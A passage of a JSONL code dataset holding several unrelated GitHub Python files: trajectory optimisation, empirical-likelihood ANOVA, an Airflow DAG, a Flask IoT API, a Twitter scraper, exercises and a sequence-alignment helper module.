1)][opt_idx].copy()\n opt_robot_traj_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n robot_eql_traj_x = opt_robot_traj_x.copy()\n robot_eql_traj_y = opt_robot_traj_y.copy()\n # extract optimal pedestrian trajectories\n opt_joint_traj_x = np.zeros((essential_num, traj_len))\n opt_joint_traj_y = np.zeros((essential_num, traj_len))\n for i in range(essential_num):\n agent_idx = essential_cluster[i]\n single_agent_pdf = agents_pdf_x[agent_idx] * agents_pdf_y[agent_idx]\n opt_idx = np.argmax(single_agent_pdf * weights[i])\n opt_joint_traj_x[i] = agents_sample_x[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n opt_joint_traj_y[i] = agents_sample_y[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n else:\n # extract optimal robot trajectory\n # robot_pdf = agents_pdf_x[-1] * agents_pdf_x[-1]\n opt_idx = np.argmax(weights[-1])\n opt_robot_traj_x = agents_sample_x[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n opt_robot_traj_y = agents_sample_y[num_samples * num_peds:num_samples * (num_peds + 1)][opt_idx].copy()\n robot_eql_traj_x = opt_robot_traj_x.copy()\n robot_eql_traj_y = 
opt_robot_traj_y.copy()\n # extract optimal pedestrian trajectories\n opt_joint_traj_x = np.zeros((essential_num, traj_len))\n opt_joint_traj_y = np.zeros((essential_num, traj_len))\n for i in range(essential_num):\n agent_idx = essential_cluster[i]\n # single_agent_pdf = agents_pdf_x[agent_idx] * agents_pdf_y[agent_idx]\n opt_idx = np.argmax(weights[i])\n opt_joint_traj_x[i] = agents_sample_x[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n opt_joint_traj_y[i] = agents_sample_y[num_samples * agent_idx:num_samples * (agent_idx + 1)][\n opt_idx].copy()\n else:\n opt_robot_traj_x = np.array([robot_mu_x.copy()])\n opt_robot_traj_y = np.array([robot_mu_y.copy()])\n opt_joint_traj_x = np.array([robot_mu_x.copy()])\n opt_joint_traj_y = np.array([robot_mu_y.copy()])\n robot_eql_idx = np.zeros(num_samples)\n robot_eql_traj_x = np.array([robot_mu_x.copy() for _ in range(num_samples)])\n robot_eql_traj_y = np.array([robot_mu_y.copy() for _ in range(num_samples)])\n\n # process and store optimization time\n ess_time = time.time() - start_time\n ess_time_array[frame] = ess_time\n ess_ave_time = math.trunc(1e3 * np.mean(ess_time_array[:frame + 1])) / 1e3\n ess_std_time = math.trunc(1e3 * np.std(ess_time_array[:frame + 1])) / 1e3\n\n print('e_igp_compute elapsed time: ', time.time() - start_time, time_gp * ess)\n\n time_gp = time_gp * (num_peds_nonzero + 1)\n\n #######################################################################################################\n\n return robot_goal_x, robot_goal_y, gp_x, gp_y, x_obs, y_obs, \\\n x_obs_un, y_obs_un, robot_mu_x, robot_mu_y, ped_mu_x, ped_mu_y, \\\n robot_cov_x, robot_cov_y, ped_cov_x, ped_cov_y, \\\n nonzero_ped_idx, nonzero_ped_idx_robot, influence_scores, essential_cluster, \\\n robot_rv_x, robot_rv_y, opt_robot_traj_x, opt_robot_traj_y, \\\n opt_joint_traj_x, opt_joint_traj_y, robot_eql_idx.copy(), robot_eql_traj_x.copy(), robot_eql_traj_y.copy(), \\\n ess, ess_array, ess_time, ess_time_array, ess_ave_time, ess_std_time, time_gp\n\n # ess, top_Z_indices, ess_array, ess_time, ess_time_array, \\\n # ess_ave_time, \\\n # ess_std_time, optima, optimal_ll, optima_dex, num_optima, \\\n # norm_likelihood, global_optima_dex, time_gp, \\\n # agent_disrupt, robot_agent_disrupt\n","repo_name":"MurpheyLab/DistNav-ETH-Evaluation","sub_path":"distnav/distnav_run.py","file_name":"distnav_run.py","file_ext":"py","file_size_in_byte":13968,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11951193223","text":"import numpy as np \nimport scipy\nfrom scipy.optimize import fsolve, root_scalar\nfrom tqdm import tqdm\n\n# realisation of the Empirical Likelihood One-Way ANOVA (the description of the method can be found \n# in the book of its author: \"Empirical Likelihood\" by Art B. Owen, CHAPMAN & HALL/CRC, 2001). 
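# Hedged usage sketch (illustrative, not part of the original module): it only
# uses names defined below in this file (get_samples, ANOVA_EL); the sample
# type 'a1' and the sizes are arbitrary choices.
#   X = get_samples('a1', n=20, K=5)      # five N(0, 1) subsamples, H_0 holds
#   test = ANOVA_EL()
#   test.fit(X)                           # sets test.logR, test.pvalue, test.MELE
#   if test.pvalue > 0.05:                # H_0 not rejected at the 5% level
#       ci = test.confidence_interval(X)  # asymptotic 95% CI for the common mean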
\n\n# utils.\ndef get_samples(s, n=20, K=5, std=None):\n '''\n samples from tasks for theme 6 (ksampletests)\n\n input:\n s: string, type of sample\n n: list of sample sizes\n K: int, subsamples in sample\n std: numpy array of standard deviations, shape = (K, )\n\n samples from:\n a) normal distribution: N(a_i, 1).\n b) uniform distribution: U[a_i-0.5, a_i+0.5]\n c) Laplace distribution: Laplace(a_i, 1) ~ [exp(1) with sign] + a_i\n\n with:\n 1) a_1=...=a_5=0,\n 2) a_1=...=a_4=0, a_5=0.5,\n 3) a_i=i/10,\n 4) like 1) but: std(X_5) = 2*std(X_1).\n\n output:\n list with K subsamples, subsample shapes: (n[i], )\n '''\n\n if isinstance(n, int):\n n = np.ones(K).astype('int64') * n\n\n scale_norm = np.ones(K) # std\n loc_uniform = -0.5 * np.ones(K) # left bound of support\n scale_uniform = np.ones(K) # length of support\n scale_laplace = np.ones(K) # scale^{-1} is assosiated 'exp' parameter. \n\n if isinstance(std, np.ndarray):\n # remind for [symmetric] uniform: std(X) = (b-a) / sqrt(12) = [b = c, a = -c] = c / sqrt(3)\n # remind for Laplace: std(X) = sqrt(2) * scale; \n scale_norm = std\n loc_uniform = -std * np.sqrt(3)\n scale_uniform = 2 * std * np.sqrt(3)\n scale_laplace = std / np.sqrt(2)\n\n if s=='a1': # N(0, 1)\n X = [scipy.stats.norm.rvs(size=n[i], scale=scale_norm[i]) for i in range(K)]\n if s=='a2': # N(0, 1) & N(0.5, 1)\n X = [scipy.stats.norm.rvs(size=n[i], scale=scale_norm[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='a3': # N(i/10, 1)\n X = [scipy.stats.norm.rvs(size=n[i], loc=i/10, scale=scale_norm[i]) for i in range(K)]\n if s=='a4': # N(0, 1) & N(0, 4)\n X = [scipy.stats.norm.rvs(size=n[i]) for i in range(K)]\n X[-1] = X[-1] * 2\n \n if s=='b1': # R[-1/2, 1/2]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) for i in range(K)]\n if s=='b2': # R[-1/2, 1/2] & R[0, 1]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='b3': # R[-0.5 + i/10, 0.5 + i/10]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=loc_uniform[i], scale=scale_uniform[i]) + i/10 for i in range(K)]\n if s=='b4': # R[-1/2 , 1/2] & R[-1, 1]\n X = [scipy.stats.uniform.rvs(size=n[i], loc=-0.5, scale=1) for i in range(K)]\n X[-1] = X[-1] * 2\n \n if s=='c1': # Laplace(0, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=scale_laplace[i]) for i in range(K)]\n if s=='c2': # Laplace(0, 1) & Laplace(0.5, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=scale_laplace[i]) for i in range(K)]\n X[-1] = X[-1] + 0.5\n if s=='c3': # Laplace(i/10, 1)\n X = [scipy.stats.laplace.rvs(size=n[i], loc=i/10, scale=scale_laplace[i]) for i in range(K)]\n if s=='c4': # Laplace(0, 1) & Laplace(0, 0.5)\n X = [scipy.stats.laplace.rvs(size=n[i], scale=1) for i in range(K)]\n X[-1] = X[-1] * 2\n \n return X\n\n\ndef pvals_plot(pvals, ax, title, bisector=True):\n '''\n input:\n pvals: sorted (!) numpy array\n ax: matplotlib Axes object\n title: string\n bisector: y=x on plot\n\n change axes: plot of 'linearly interpolated' p-value ECDF. 
\n '''\n if bisector:\n xvals = np.linspace(0, 1, num=pvals.shape[0]).tolist() + [1] \n ax.plot(pvals.tolist()+[1], xvals, color='tab:blue')\n ax.plot(xvals, xvals, '--', color='tab:red')\n else:\n xvals = np.linspace(0, 1, num=pvals.shape[0])\n ax.plot(pvals, xvals, color='tab:blue')\n\n ax.set_title(title)\n\n\n# utils.\ndef pseudo_log(x):\n '''\n log with quadratic approximation if x < 1.\n\n input: numpy array or float/int\n '''\n if not isinstance(x, np.ndarray):\n y = np.array(x)\n else:\n y = x.copy()\n \n y = np.where(y > 1, np.log(y), y-1 - (y-1)**2 / 2)\n return y if y.shape else y.item()\n\n\ndef L_star(l, mu, X):\n '''\n let K be the number of subsamples\n\n input:\n mu: mean\n params: array with shape (K,): [l1,...,l_K] - Lagrange multipliers\n X: list of K numpy arrays with shape (n_i, )\n '''\n\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n stat = 0\n for i in range(K):\n term = N + l[i]*(X[i]-mu)\n if np.any(term < 0):\n print(f'Negative term: mu={mu}')\n stat += np.sum(pseudo_log(term))\n\n return stat - N*np.log(N)\n\n\ndef L(l, mu, X):\n '''\n let K be the number of subsamples.\n\n input:\n mu: mean\n params: array with shape (K,): [l1,...,l_K] - Lagrange multipliers\n X: list of K numpy arrays with shape (n_i, )\n\n output:\n min_{mu} max_{l} L(l, mu) = L(l*, mu*) = -max_{mu} ln(R(mu))\n '''\n\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n stat = 0\n for i in range(K):\n term = N / (N + l[i]*(X[i]-mu))\n\n\t\t# This condition is bad (but right: we need to get log(R)=-inf).\n\t\t# It doesn't allow us to use optimizing techniques - cause optimizer will just do some negative term and go to inf...\n if np.any(term < 0):\n # print(f'Negative term under log: mu={mu}')\n return np.inf\n\n stat -= np.sum(np.log(term))\n return stat\n\n\ndef optimality_equations(l, X, mu):\n '''\n map R^{K+1} \\to R^{K+1}\n\n input:\n l: list with len K: [l1,...,l_K] - Lagrange multipliers (if mu=None, list with len K+1: [l1,...,l_K, mu])\n X: list of K numpy arrays with shape (n_i, )\n\n optimality_equations(l*, X) = 0 for optimal l*\n\n output:\n mu=None: numpy array, shape=(K+1,)\n mu=mu_0: numpy array, shape=(K,)\n '''\n n = np.array([x.shape[0] for x in X]) # subsamples sizes\n N = n.sum()\n K = len(X)\n \n if mu is None: # mu is unknown: K+1 equations\n equations = np.zeros(K+1)\n for i in range(K):\n equations[i] += np.sum( (X[i]-l[-1]) / (N + l[i]*(X[i]-l[-1])) ) # sum_j\n equations[-1] += np.sum( l[i] / (N + l[i]*(X[i]-l[-1])) )\n else: # mu = mu_0: K equations\n equations = np.zeros(K)\n for i in range(K):\n equations[i] += np.sum( (X[i]-mu) / (N + l[i]*(X[i]-mu)) ) # sum_j\n\n return equations\n\n\n# main class.\nclass ANOVA_EL():\n '''\n 1) run the Empirical Likelihood Ratio ANOVA test and get the (asymptotic-based) pvalue of this test.\n \n If H_0 wasn't rejected:\n 2) find Maximum Empirical Likelihood Estimator (MELE) of the common mean.\n 3) find asymptotic 95%-confidence interval for the common mean.\n '''\n def __init__(self):\n self.logR = 0 # log-profile function R(X)\n self.pvalue = 0 # pvalue of one-way ANOVA EL test\n self.l = [] # optimal Lagrange Multipliers\n self.MELE = 0 # optimal mu (Maximum Empirical Likelihood Estimator)\n \n def fit(self, X, verbose=False):\n '''\n X: list of K numpy arrays with shape (n_i, ), n_1+...+n_K = N\n verbose: prints output\n\n - MELE of mu.\n - log-statistic value.\n - test pvalue.\n '''\n self.df = len(X)-1\n self.logR = self.R(mu=None, X=X, verbose=verbose)\n self.pvalue = scipy.stats.chi2.sf(x=-2*self.logR, df=self.df)\n 
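 # Hedged numeric check (not in the original source): under H_0 the statistic
 # -2*logR is asymptotically chi-square with df = K-1, so for K = 5 subsamples
 # the 5% critical value is scipy.stats.chi2.ppf(0.95, df=4) ~ 9.488; any
 # -2*logR above that yields pvalue < 0.05 and rejects equality of the means.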
\n def R(self, mu, X, verbose=False):\n '''\n input:\n X: list of K numpy arrays with shape (n_i, ), n_1+...+n_K = N\n mu: if mu=None => find optimal mu (MELE); else: calculate log(R(mu))\n verbose: if True - prints output\n\n output:\n log of maximum profile function.\n '''\n N = sum([x.shape[0] for x in X])\n K = len(X)\n \n if mu is None: # mu is unknown\n sample_mean = sum([x.sum() for x in X]) / N\n l = np.zeros(K).tolist() + [sample_mean]\n \n if verbose:\n l_optimal, d, _, message = fsolve(optimality_equations, l, args=(X, None), full_output=True)\n calls = d['nfev'] # function calls.\n residual = np.sum(np.abs(d['fvec'])) # residual.\n else:\n l_optimal = fsolve(optimality_equations, l, args=(X, None))\n\n self.l, self.MELE = l_optimal[:-1], l_optimal[-1]\n\n if verbose:\n p = []\n for i in range(K):\n p.append(1/( N + self.l[i]*(X[i]-self.MELE)))\n p = np.array(p)\n\n print()\n print(f\"{f'Residual on call {calls}:':<25}\", residual)\n print(f\"{f'Opt. Lagrange mult.:':<25}\", np.around(self.l, 6))\n print(f\"{f'MELE:':<25}\", self.MELE)\n print(f\"{f'Probs is positive:':<25}\", np.all([np.all(p_ > 0) for p_ in p]))\n print(f\"{f'Sum of probs:':<25}\", sum([p_.sum() for p_ in p]))\n print(message)\n print()\n return -L(self.l, self.MELE, X)\n else: # mu = mu_0\n\n # convex hull condition.\n #for x in X:\n # if x.min() > mu or x.max() < mu:\n # return -np.inf\n\n l = np.zeros(K).tolist()\n l_optimal = fsolve(optimality_equations, l, args=(X, mu))\n return -L(l_optimal, mu, X)\n\n def confidence_interval(self, X):\n '''\n can be applied only after fit method (to get self.MELE)\n '''\n x_1 = min([min(x) for x in X])\n x_N = max([max(x) for x in X])\n q = scipy.stats.chi2.ppf(0.95, df=(self.df+1)) # we need to add 1 to df as we don't get max_{\\mu}.\n\n # log(R) is concave.\n try:\n left = root_scalar(lambda y: -2*self.R(y, X)-q, args=(), method='bisect', bracket=[x_1+1e-5, self.MELE], xtol=1e-6)\n right = root_scalar(lambda y: -2*self.R(y, X)-q, args=(), method='bisect', bracket=[self.MELE, x_N-1e-5], xtol=1e-6)\n return [left.root, right.root]\n except ValueError:\n return None # conf.set is empty...\n","repo_name":"thesnowballino/empirical_likelihood_anova","sub_path":"empirical_likelihood_anova.py","file_name":"empirical_likelihood_anova.py","file_ext":"py","file_size_in_byte":10430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10617238406","text":"import pandas as pd\ndef integer_set(fi):\n with open(fi) as f:\n answer=f.readlines()\n\n lambdaf=lambda x:int(x.strip(),2)\n\n answer=set(map(lambdaf,answer))\n\n return answer\n\nanswer_file=\"answer.txt\"\nsolution_file=\"simulated_solution.txt\"\n\nanswer=integer_set(answer_file)\nsolution=integer_set(solution_file)\n\nprint(\"Length answer: {} \\t Length solution: {}\".format(len(answer),len(solution)))\nprint(answer.difference(solution)) #If empty set, then the answers are identical\n","repo_name":"bricoletc/ctbl","sub_path":"simu/check_answer.py","file_name":"check_answer.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40985229397","text":"\"\"\"DAG to drop a redshift cluster.\"\"\"\nfrom airflow import DAG\nfrom airflow.utils.dates import days_ago\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom redshift_utils import 
destroy_cluster\n\n\nfrom datetime import timedelta\n\ndefault_args = {\n \"owner\": \"airflow\",\n \"depends_on_past\": True,\n \"wait_for_downstream\": True,\n \"start_date\": days_ago(15),\n \"email\": [\"airflow@example.com\"],\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"retry_delay\": timedelta(minutes=5),\n}\n\nwith DAG(\n \"destroy_redshift_cluster\",\n default_args=default_args,\n description=\"dag to destroy a redshift cluster\",\n schedule_interval=None,\n catchup=False,\n) as dag:\n\n start_task = DummyOperator(task_id=\"start\")\n\n source_env = BashOperator(\n task_id=\"source_env_variables\", bash_command=\"source .env\"\n )\n\n destroy_cluster_task = PythonOperator(\n task_id=\"destroy_redshift_cluster\", python_callable=destroy_cluster.main,\n )\n\n end_task = DummyOperator(task_id=\"end\")\n\n start_task >> source_env >> destroy_cluster_task >> end_task\n","repo_name":"ankhoudary12/covid19_etl","sub_path":"dags/destroy_redshift_cluster.py","file_name":"destroy_redshift_cluster.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"27584367624","text":"import sys\nfrom const import *\nfrom flask import Flask, jsonify, make_response, abort, request\nfrom controller import ThingController\n\n\nID = sys.argv[1]\nPORT = sys.argv[2]\n\nprint(\"Iniciando Interface\")\n\napp = Flask(__name__)\napp.debug = DEBUG\n\nthing = ThingController()\n\n\n## DEFAULT ##\n@app.route('/', methods=['GET'])\ndef get_hello():\n info = {\n 'actions': {\n 'turn': ['on', 'off'],\n 'measurement': 'Integer'\n },\n 'measurement': {\n 'measurement': 'Integer'\n }\n }\n return make_response(jsonify(info), 200)\n\n\n@app.route('/actions', methods=['PUT'])\ndef action_turn():\n global thing\n actions = request.json\n result = thing.actions(actions)\n if result:\n if result['message']:\n return make_response(jsonify({'message': 'Action registered'}), 200)\n else:\n return make_response(jsonify(result), 200)\n else:\n return make_response(jsonify({'message': 'Action doesn\\'t exist'}), 404)\n\n\n@app.route('/observables', methods=['PUT'])\ndef observe():\n # thing.observe(notify_event())\n return make_response({'message': 'Observable registered'}, 200)\n\n\ndef notify_event(event):\n print(\"Evento aconteceu\")\n\n\nif __name__ == '__main__':\n try:\n if DEBUG:\n app.run(port=int(PORT))\n else:\n app.run(host='0.0.0.0', port=int(PORT))\n except KeyboardInterrupt:\n pass\n finally:\n print(\"Cancelando a aplicação RESTful...\\n\")\n","repo_name":"thomasmarquesbr/middleware_flyiot","sub_path":"controller_sensor/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"39906660449","text":"# configuration for this webapp\nimport server_config, user_administration, group_administration, share_administration, share_file_administration, user_auth\n\nname=\"streaPy configuration Application\"\n\ndocroot=\".\"\n\nsnakelets={\n\t\"serverConfig.sn\": server_config.ServerConfig,\n\t\"userAdministration.sn\": user_administration.UserAdministration,\n\t\"groupAdministration.sn\": group_administration.GroupAdministration,\n\t\"shareAdministration.sn\": share_administration.ShareAdministration,\n\t\"shareFileAdministration.sn\": share_file_administration.ShareFileAdministration,\n\t\"userAuth.sn\": user_auth.userAuth\n}\n\ndef dirListAllower(path):\n\t# path will be 
RELATIVE for this webapp, and NOT starting with /\n\n\t# this (root)webapp allows ALL dirs to be viewed\n\treturn True\n","repo_name":"toha/streapy","sub_path":"snakelets_webserver/Snakelets-1.44/webapps/streapy_config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"3742268101","text":"cod1, quant1, valor1 = input().split()\ncod2, quant2, valor2 = input().split()\n\n# first line\ncod1 = int(cod1)\nquant1 = int(quant1)\nvalor1 = float(valor1)\n\n# second line\ncod2 = int(cod2)\nquant2 = int(quant2)\nvalor2 = float(valor2)\n\ntotal = (quant1 * valor1) + (quant2 * valor2)\nprint(f'VALOR A PAGAR: R$ {total:.2f}')\n","repo_name":"RFreitasAnjos/beecrowd","sub_path":"Begginer/Valortotal2produtos.py","file_name":"Valortotal2produtos.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} {"seq_id":"19599683605","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nimport tweepy\nfrom datetime import datetime\nimport pytz\nimport whitelistUtil as wu\n\n\n\n#Makes the time actually easily readable ex: \"06:09 PM Oct-31\"\ndef parseTime(time=None):\n fmt = \"%I:%M %p %b-%d\"\n return time.strftime(fmt)\n\n#Read getWhitelistedTweets()'s comments to understand the code; it's basically the same thing, just without the whitelist for loop\ndef getNonWhitelistedTweets(api, pRawQuery):\n data = \" \"\n easternTimezone = pytz.timezone('US/Eastern')\n utcTimezone = pytz.timezone('UTC')\n\n tweets = tweepy.Cursor(api.search, q=pRawQuery, lang=\"en\").items(3)\n for tweet in tweets:\n status = api.get_status(tweet.id ,tweet_mode=\"extended\")\n if tweet.text.split(\" \")[0] == \"RT\":\n pass\n else:\n rawTweetTime = datetime.strptime(str(tweet.created_at), \"%Y-%m-%d %H:%M:%S\")\n convTweetTime = utcTimezone.localize(rawTweetTime)\n tweetTime = parseTime(convTweetTime.astimezone(easternTimezone))\n scrnName = tweet.user.screen_name\n tweetText = status.full_text \n linkText = tweetText.split(\" \")[-1]\n \n if linkText[0:4] == \"http\":\n data += f\"@{scrnName}<br> {tweetText}<br> {tweetTime}<br> <a href='{linkText}'>Link</a>\"+\"<br><br>\"\n else:\n data += f\"@{scrnName}<br> {tweetText}<br> {tweetTime}<br><br>\" \n\n return data\n\n\n#Gets the **LATEST** tweets from the users specified in the whitelist, then returns a concatenated string, with html tags, for Flask web \ndef getWhitelistedTweets(api, pRawQuery):\n #Final var, will be concatenated and returned\n data = \" \"\n easternTimezone = pytz.timezone('US/Eastern')\n utcTimezone = pytz.timezone('UTC')\n\n #the only people whose tweets will be returned\n whitelists = wu.readTwitterWhitelist()\n ##User given query, it is raw currently, because it needs some formatting to search for specific users, ex) \"$TSLA from:DeItaOne\"\n \n for whitelist in whitelists:\n #formats the search query to make it only from people in whitelist\n formattedSearch = pRawQuery + f\" from:{whitelist}\"\n #Searches and gets the 3 latest tweets, from the given query\n tweets = tweepy.Cursor(api.search, q=formattedSearch, lang=\"en\").items(3)\n \n for tweet in tweets:\n #Makes the tweet in \"extended mode\", which makes it not truncated, and shows the FULL tweet.\n status = api.get_status(tweet.id ,tweet_mode=\"extended\")\n \n #We dont want retweets, so checking if the first word is \"RT\" signifying it is a retweet \n if tweet.text.split(\" \")[0] == \"RT\":\n pass\n else:\n for name in whitelists:\n if tweet.user.screen_name == name:\n #Gets the time the tweet was tweeted, and formats it for later parsing\n rawTweetTime = datetime.strptime(str(tweet.created_at), \"%Y-%m-%d %H:%M:%S\")\n #converted to UTC\n convTweetTime = utcTimezone.localize(rawTweetTime)\n #Finally converted to EST\n tweetTime = parseTime(convTweetTime.astimezone(easternTimezone))\n #Gets the screen name of the tweeter\n scrnName = tweet.user.screen_name\n #The full un-truncated text\n tweetText = status.full_text \n #getting the link from the tweet (if there is one like a news page)\n linkText = tweetText.split(\" \")[-1]\n #checking if there is a link; if so, an html tag will be added to make the link clickable \n \n if linkText[0:4] == \"http\":\n data += f\"@{scrnName}<br> {tweetText}<br> {tweetTime}<br> <a href='{linkText}'>Link</a><br><br>\"\n #If no link, then the tag won't be added.\n else:\n data += f\"@{scrnName}<br> {tweetText}<br> {tweetTime}<br><br>
\" \n else:\n pass\n return data\n\n#Gets the latest tweets from the \"scName\" specified. \ndef tWhite(api):\n scName = [\"realDonaldTrump\", \"MarketWatch\", \"DeItaOne\"]\n for x in scName:\n tweets = api.user_timeline(screen_name = x)\n print(tweets[0].user.screen_name)\n print(tweets[0].text)\n print(parseTime(tweets[0].created_at))\n print(\"_\" *100)\n\n#Twitter main function, has all the secrets and keys to authenticate.\ndef twitter(pWhitelistChoice ,searchQuery): \n try:\n #Enter your twitter auth codes here.\n consumerKey = \"\"\n consumerSecret = \"\"\n accessToken = \"\"\n accessSecret = \"\"\n\n auth = tweepy.OAuthHandler(consumerKey, consumerSecret)\n auth.set_access_token(accessToken, accessSecret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n\n if pWhitelistChoice == \"Whitelist\":\n data = getWhitelistedTweets(api, searchQuery)\n return data\n else:\n data = getNonWhitelistedTweets(api, searchQuery)\n return data\n except Exception as e:\n print(\"Authentication Failed... No Twitter results will be shown.\")\n print(e)\n return \"oof\"","repo_name":"PushKaf/google-twitter-content-aggregator","sub_path":"Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":5607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18984112183","text":"import sys\n\nfrom phising.exception import PhisingException\nfrom phising.pipeline.training_pipeline import TrainPipeline\nfrom phising.utils.main_utils import sync_app_artifacts\n\n\ndef start_training():\n try:\n tp = TrainPipeline()\n\n tp.run_pipeline()\n\n except Exception as e:\n raise PhisingException(e, sys)\n\n finally:\n sync_app_artifacts()\n\n\nif __name__ == \"__main__\":\n start_training()\n","repo_name":"sethusaim/phising-classifaction","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"15475284140","text":"class Solution:\n def wateringPlants(self, plants: List[int], capacity: int) -> int:\n temp = capacity\n ans = 0\n for i in range(len(plants)):\n temp -= plants[i]\n if temp >= 0:\n ans += 1\n else:\n temp = capacity - plants[i]\n ans += (2 *i)+ 1\n return ans","repo_name":"Tolosa-mitiku/leet-code","sub_path":"2079-watering-plants/2079-watering-plants.py","file_name":"2079-watering-plants.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39109968532","text":"# calling of functions\n# 2 ways for calling a function\n# call by value (pass by value)\n# call by reference (pass by reference)\n\n# call by value\ndef myfun(x):\n x=13\n print(x, id(x))\n\nx=15\nmyfun(x)\nprint(x, id(x))\n\ndef myfun1(x):\n x=13\n print(x, id(x))\n\ny=15\nmyfun1(y)\nprint(y, id(y))\n\n# local varible\n# this varible says that if a varible is used inside a function then the life time limits upto that function exists.\n# after the job of functions gets over then the scope of variable also over.\n# the preference of local varible inside a function is always top most.","repo_name":"kumarsandeep2166/arpita-python-class","sub_path":"functions/demo6.py","file_name":"demo6.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3057149315","text":"from typing import Tuple\n\"\"\"A module for translating between alignments and edits 
sequences.\"\"\"\n\n\ndef get_edits(p: str, q: str) -> Tuple[str, str, str]:\n \"\"\"Extract the edit operations from a pairwise alignment.\n\n Args:\n p (str): The first row in the pairwise alignment.\n q (str): The second row in the pairwise alignment.\n\n Returns:\n str: The list of edit operations as a string.\n\n >>> get_edits('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n ('ACCACAGTCATA', 'ACAGAGTACAAA', 'MDMMMMMMIMMMM')\n\n \"\"\"\n assert len(p) == len(q)\n\n out_p = ''\n out_q = ''\n edits = ''\n\n for i in range(len(p)):\n cp = p[i]\n cq = q[i]\n if cp != '-' and cq != '-':\n out_p += cp\n out_q += cq\n edits += 'M'\n if cp == '-':\n out_q += cq\n edits += 'I'\n if cq == '-':\n out_p += cp\n edits += 'D'\n\n\n return out_p, out_q, edits\n\n\ndef local_align(p: str, x: str, i: int, edits: str) -> Tuple[str, str]:\n \"\"\"Align two sequences from a sequence of edits.\n\n Args:\n p (str): The read string we have mapped against x\n x (str): The longer string we have mapped against\n i (int): The location where we have an approximative match\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n tuple[str, str]: The two rows in the pairwise alignment\n\n >>> local_align(\"ACCACAGTCATA\", \"GTACAGAGTACAAA\", 2, \"MDMMMMMMIMMMM\")\n ('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n\n \"\"\"\n return align(p, x[i:], edits)\n\n\ndef align(p: str, q: str, edits: str) -> Tuple[str, str]:\n \"\"\"Align two sequences from a sequence of edits.\n\n Args:\n p (str): The first sequence to align.\n q (str): The second sequence to align\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n tuple[str, str]: The two rows in the pairwise alignment\n\n >>> align(\"ACCACAGTCATA\", \"ACAGAGTACAAA\", \"MDMMMMMMIMMMM\")\n ('ACCACAGT-CATA', 'A-CAGAGTACAAA')\n\n \"\"\"\n out_p = ''\n out_q = ''\n i_p = 0\n i_q = 0\n\n for e in edits:\n if (e == 'M'):\n out_p += p[i_p]\n out_q += q[i_q]\n i_p += 1\n i_q += 1\n if (e == 'I'):\n out_p += '-'\n out_q += q[i_q]\n i_q += 1\n if (e == 'D'):\n out_p += p[i_p]\n out_q += '-'\n i_p += 1\n \n\n return out_p, out_q\n\n\ndef edit_dist(p: str, x: str, i: int, edits: str) -> int:\n \"\"\"Get the distance between p and the string that starts at x[i:]\n using the edits.\n\n Args:\n p (str): The read string we have mapped against x\n x (str): The longer string we have mapped against\n i (int): The location where we have an approximative match\n edits (str): The list of edits to apply, given as a string\n\n Returns:\n int: The distance from p to x[i:?] 
